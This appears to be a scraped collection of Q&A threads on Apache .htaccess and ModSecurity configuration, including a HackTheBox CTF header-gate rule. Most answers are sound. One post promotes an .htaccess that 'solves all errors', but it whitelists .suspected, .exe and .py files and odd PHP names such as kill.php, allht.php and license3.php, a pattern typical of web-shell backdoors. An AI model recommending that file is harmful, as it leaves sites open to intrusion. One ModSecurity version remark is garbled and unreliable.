I was doing a CTF on HackTheBox and came across an .htaccess rule that is puzzling me:
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Is it valid? And if so, what is it supposed to do? I am most puzzled by the Required-Header at the end of the line.
The above rule is the first in the .htaccess file. For reference, here is the rest of it:
Order Deny,Allow
Deny from All
Allow from env=Required-Header
My payment gateway is blocked by mod_security when trying to access the WooCommerce endpoint.
I'm receiving a 403 permission denied when trying to access the "/wc-api/my_gateway_payment_callback" endpoint.
I'm on a LiteSpeed shared host.
When disabling mod_security from .htaccess:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
it solves the issue but exposes WordPress admin to attacks, so I want to be more specific.
I tried to add a LocationMatch:
<LocationMatch "/wc-api/my_gateway_payment_callback">
<IfModule mod_security.c>
SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
</IfModule>
</LocationMatch>
or
<IfModule mod_security.c>
SecRule REQUEST_URI "@beginsWith /my_gateway_payment_callback" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
</IfModule>
but they don't work and I'm still getting the 403 error.
I can spot multiple problems here:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Are you really using ModSecurity v1? That is VERY old and suggests you are using Apache 1, as ModSecurity v1 is not compatible with ModSecurity v1. If not, this should be:
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
Next you say:
it solves the issue but exposes WordPress admin to attacks
I don't see how it can solve the issue unless you are on REALLY old software, so suspect this is a red herring.
so I want to be more specific. I tried to add a LocationMatch
Good idea to be more specific. However, LocationMatch runs quite late in Apache's processing, after the ModSecurity rules will have run, so this will not work. However, you don't really need LocationMatch since your rule already scopes it to that location. So let's look at the next two pieces:
SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
SecRuleRemoveById 3000
You shouldn't need to remove the rule if you allow it on the previous lines. Typically you would only do one or the other.
or
<IfModule mod_security.c>
SecRule REQUEST_URI "@beginsWith /my_gateway_payment_callback" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
</IfModule>
but they don't work and I'm still getting the 403 error.
You have pass (which means continue on to the next rule) and allow (which means skip all future rules). It seems to me you only want the latter and not the former. As these are conflicting, I suspect ModSecurity will action the former first hence why it is not working.
However the better way is to look at the Apache error logs to see what rule it's failing on (is it rule 3000 as per your other LocationMatch workaround?) and just disable that one rule rather than disable all rules for that route.
So all in all I'm pretty confused with your question as seems to be a lot of inconsistencies and things that are just wrong in there...
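As an added example (not the answer's own configuration), here are the two narrower forms the answer points at, written in ModSecurity 2 syntax; use one or the other, not both, and RULE_ID_FROM_ERROR_LOG is a placeholder for the id of the rule the Apache error log shows blocking the request:

```apache
<IfModule mod_security2.c>
    # Option 1: a single disruptive action. "allow" on its own lets the
    # callback through, without the conflicting "pass" from the original rule.
    SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback" \
        "id:1000,phase:1,nolog,allow,msg:'Payment callback allowed'"

    # Option 2 (what the answer recommends): keep every rule active and switch
    # off only the one that produced the 403, and only for this URI.
    # RULE_ID_FROM_ERROR_LOG is a placeholder taken from the error log.
    SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback" \
        "id:1001,phase:1,nolog,pass,ctl:ruleRemoveById=RULE_ID_FROM_ERROR_LOG"
</IfModule>
```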
I have one website (www.mysite.com) that I have on a temporary redirect to another folder (www.mysite.com/tempfolder/index.php). I also host another site in the root folder of www.mysite.com called www.subsite.com. It has its own URL, but I can't figure out how to make that entire sub-folder exempt from the redirect! Any ideas? Here is what my .htaccess file looks like right now (which is perfectly redirecting everything to the temporary landing page).
<Limit GET POST PUT>
order deny,allow
deny from all
allow from ***
allow from ****
allow from *****
</Limit>
ErrorDocument 403 http://www.mysite.com/tempfolder/index.php
<FilesMatch "\.(htm|html|php|css|js|gif|jpg|db|png)$">
order allow,deny
allow from all
</FilesMatch>
Any ideas? thanks all!
Try putting an .htaccess file in the subfolder that does not contain the redirection rules. That should work just fine; it can even be a blank file.
I keep getting my .htaccess file hacked on my WordPress installation, what can I do to prevent this from happening again?
http://pastebin.com/H54FaA8U
Have a look on security.stackexchange.com's wordpress tag for guidance here, and this question in particular.
Change your user name and password; use a tough password that has numbers, digits, characters, caps, etc.
Remove all the extra templates. One of your template files is infected and is rewriting the .htaccess file.
Update all the plugins and templates that you are using.
Remove all the extra plugins that you no longer use.
It worked for me. Good luck.
Add this code to your WordPress .htaccess file to protect the .htaccess and wp-config.php files from unauthorized access:
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
<Files wp-config.php>
order allow,deny
deny from all
</Files>
I saw several .htaccess examples disabling access to some files:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
For example, this prevents access to all .JS and .SQL files; the others are enabled. I want the contrary! I want those files to be ENABLED and all others to be prevented. How do I achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order clause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaluated: if a request matches any deny directive, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaluated: if a request matches an allow directive, it's allowed in, even if it matched a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
Oh, and one more thing: directives in a section (i.e. <Files> and <Directory>) are always evaluated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as intended: the main .htaccess denied the request, then the <Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
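As an added example that is not part of any post here, the Order logic this answer describes, and the env=Required-Header gate from the first question at the top of the page, modelled in Python; it is a model of the semantics as explained above, not Apache's own code, and the IP and header values in it are constructed.

```python
# Added example (not code from any post above): a small model of Apache's
# Order / Allow / Deny decision as the answer above explains it. Hostnames are
# left out: a "from" argument is "all", "env=NAME" or a dotted IP prefix, and a
# request is a dict with an "ip" string and a set of "env" variable names.
import re

def _matches(spec, request):
    """Does one 'allow/deny from' argument match the request?"""
    if spec.lower() == "all":
        return True
    if spec.lower().startswith("env="):
        return spec[4:] in request["env"]
    # partial IPs such as "10.1" match on octet boundaries, as in Apache
    return (request["ip"] + ".").startswith(spec.rstrip(".") + ".")

def decide(order, allows, denies, request):
    """The two evaluation orders exactly as the answer describes them."""
    allowed = any(_matches(a, request) for a in allows)
    denied = any(_matches(d, request) for d in denies)
    if order.lower() == "allow,deny":
        return allowed and not denied  # deny pass wins; no match means denied
    if order.lower() == "deny,allow":
        return allowed or not denied   # allow pass wins; no match means allowed
    raise ValueError("unknown Order: " + order)

def decide_for_file(main, sections, filename, request):
    """main = (order, allows, denies); sections = [(regex, order, allows, denies)].
    A matching <Files ~ regex> section is applied after the main body and replaces
    its allow/deny lists (Order is inherited if the section sets none)."""
    order, allows, denies = main
    for pattern, s_order, s_allows, s_denies in sections:
        if re.search(pattern, filename):
            order, allows, denies = s_order or order, s_allows, s_denies
    return decide(order, allows, denies, request)

# The question's .htaccess (deny js/sql, everything else allowed by default)
# and the accepted answer's (allow only js/sql, "order allow,deny" on top).
QUESTION = (("deny,allow", [], []), [(r"\.(js|sql)$", "deny,allow", [], ["all"])])
ACCEPTED = (("allow,deny", [], []), [(r"\.(js|sql)$", None, ["all"], [])])

def set_env_if_nocase(headers, header, pattern, var):
    """Model SetEnvIfNoCase: set var if the named header's value matches pattern."""
    value = next((v for k, v in headers.items() if k.lower() == header.lower()), None)
    return {var} if value is not None and re.search(pattern, value, re.I) else set()

def header_gate(headers, ip="203.0.113.7"):
    """The first question's rules: Order Deny,Allow, Deny from All, Allow from env=Required-Header."""
    env = set_env_if_nocase(headers, "Special-Dev", "only4dev", "Required-Header")
    return decide("Deny,Allow", ["env=Required-Header"], ["All"], {"ip": ip, "env": env})
```

With these tables, foo.js passes and bar.php is refused under ACCEPTED, the reverse happens under QUESTION, and header_gate only admits requests whose Special-Dev header matches only4dev in any letter case.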
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
If you are having trouble with your website, use this .htaccess code. It solves all errors you may encounter.
DirectoryIndex index.html index.php
<FilesMatch "\.(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store)\.php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this helps you, don't forget to give a thumbs up!!!
I was told that this is the right way to redirect anyone who is trying to open:
/users/username/something.txt
But I can't seem to get it to work.
RewriteEngine on
RewriteRule \.txt$ /notallowed.html [F,L,NC]
Is this wrong?
The simplest way to deny users from all TXT files would be to use something like:
<FilesMatch "\.(txt)$">
Order Allow,Deny
Deny from all
</FilesMatch>
However, the code you have there should work for all intents and purposes. Depending on your server configuration, however, you may need to add "Options +FollowSymLinks".
If you decide to go the FilesMatch route, you can use ErrorDocument to control what page the user is taken to.